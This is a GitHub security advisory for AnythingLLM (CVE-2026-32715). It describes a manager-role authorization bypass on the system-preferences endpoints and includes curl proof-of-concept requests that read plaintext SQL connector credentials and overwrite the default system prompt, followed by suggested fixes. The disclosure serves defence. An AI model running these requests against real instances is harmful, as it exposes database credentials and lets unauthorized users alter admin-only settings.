Skip to content

Manager Privilege Bypass Allows Access to Admin-Only System Preferences

Low
timothycarambat published GHSA-wfq3-65gm-3g2p Mar 13, 2026

Package

docker anything-llm (Docker)

Affected versions

<= 1.11.1 (Git commit: `e7ebeb47`)

Patched versions

732eac6fa89f43288bbb65ecc6298ebcd96b7aeb, >1.11.1

Description

Summary

The two generic system-preferences endpoints allow manager role access, while every other surface that touches the same settings is restricted to admin only. Because of this inconsistency, a manager can call the generic endpoints directly to read plaintext SQL database credentials and overwrite admin-only global settings such as the default system prompt and the Community Hub API key.

Details

The authorization gap:

Surface Allowed roles
Frontend /settings/agents admin only (AdminRoute)
POST /system/default-system-prompt admin only
GET/POST /community-hub/settings admin only
GET /admin/system-preferences-for admin + manager
POST /admin/system-preferences admin + manager

Read pathagent_sql_connections is in publicFields. The getter returns parsed connection details including username, password, host, port, database in plaintext.

Write pathupdateSettings() checks supportedFields but does not enforce protectedFields. Both default_system_prompt and hub_api_key are in supportedFields, so a manager can overwrite them.

PoC

Preconditions:
  • Multi-user mode enabled
  • Attacker has a manager account
1: Read SQL connector credentials
curl -i -sS \
  -H "Authorization: Bearer <manager-jwt>" \
  "<base-url>/api/admin/system-preferences-for?labels=agent_sql_connections"

Expected result (if SQL connectors are configured):

{
  "settings": {
    "agent_sql_connections": [{
      "username": "db_admin",
      "password": "s3cretP@ssw0rd",
      "host": "internal-db.example.com",
      "port": "5432",
      "database": "production"
    }]
  }
}
2: Modify an admin-only setting
curl -i -sS \
  -X POST "<base-url>/api/admin/system-preferences" \
  -H "Authorization: Bearer <manager-jwt>" \
  -H "Content-Type: application/json" \
  --data '{"default_system_prompt":"CANARY_MANAGER_BYPASS"}'

Expected result:

{"success":true,"error":null}

A subsequent read of default_system_prompt reflects the canary value, confirming the setting was changed even though the dedicated write route for that setting is admin-only.

Impact

A manager can read plaintext SQL database credentials and modify global admin-only settings (default system prompt, Community Hub API key) that affect the entire instance.

Suggestion

  1. Restrict both /admin/system-preferences-for and /admin/system-preferences to ROLES.admin only, matching the dedicated write routes and frontend gating.
  2. Have updateSettings() reject keys present in protectedFields, not just accept keys in supportedFields, as defense-in-depth.
  3. Remove agent_sql_connections from publicFields and serve it through a dedicated admin-only endpoint.

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

CVE ID

CVE-2026-32715

Weaknesses

No CWEs

Credits